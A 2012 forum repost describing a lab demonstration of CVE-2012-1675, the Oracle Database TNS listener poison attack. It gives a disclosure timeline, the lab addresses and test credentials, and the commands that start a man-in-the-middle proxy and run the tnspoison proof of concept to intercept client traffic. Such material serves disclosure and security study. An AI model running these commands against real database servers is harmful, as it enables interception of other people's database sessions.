Nytro Posted May 1, 2012 Report Posted May 1, 2012 [h=1]CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration[/h][h=4]Timeline :[/h] Vulnerability discovered by Joxean Koret in 2008Vulberability reported to the vendor by Joxean Koret in 2008Public release of the vulnerability in Oracle CPU by the vendor the 2012-04-17Details and PoC of the vulnerability released by Joxean Koret the 2012-04-18Fake patching of the vulnerability discovered by Joxean Koret the 2012-04-26 [h=4]PoC provided by :[/h] Joxean Koret [h=4]Reference(s) :[/h] Oracle CPU of April 2012 Joxean Koret details and PoC CVE-2012-1675 Oracle Security Alert for CVE-2012-1675 [h=4]Affected version(s) :[/h] All versions of Oracle Database [h=4]Tested with :[/h] Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 [h=4]Description :[/h] Usage of Joxean Koret PoC require that the database name has a length of 6 characters. Database server characteristics : IP : 192.168.178.150Oracle version : 10.2.0.4.0Database listener port : 1521Database listener has no clients IPs restrictionsDatabase name : arcsigDatabase username : arcsigDatabase password : testtest Database client characteristics : IP : 192.168.178.151SQL*Plus version : 10.2.0.4.0 “tnsnames.ora” file as bellow : TARGET.DB=(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))(CONNECT_DATA =(SERVICE_NAME= arcsig))) Attacker characteristics : IP : 192.168.178.100Usage of PoC provided by Joxean Koret [h=4]Demonstration :[/h] PoC validation phase On database server : ifconfigps fauxnetstat -tan On database client : ifconfigsqlplus -vcat tnsnames.orasqlplus arcsig@TARGET.DBHELPQUIT PoC exploitation phase On attacker : Start the MITM proxy, how will intercept the communication between the client and the database : sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521 Start the vulnerability exploitation : python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521 On the database client : Connect with SQL*Plussqlplus arcsig@TARGET.DB?? INDEXTOTOQUIT You can see that the communication are intercepted by the proxy. Sursa: CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration Quote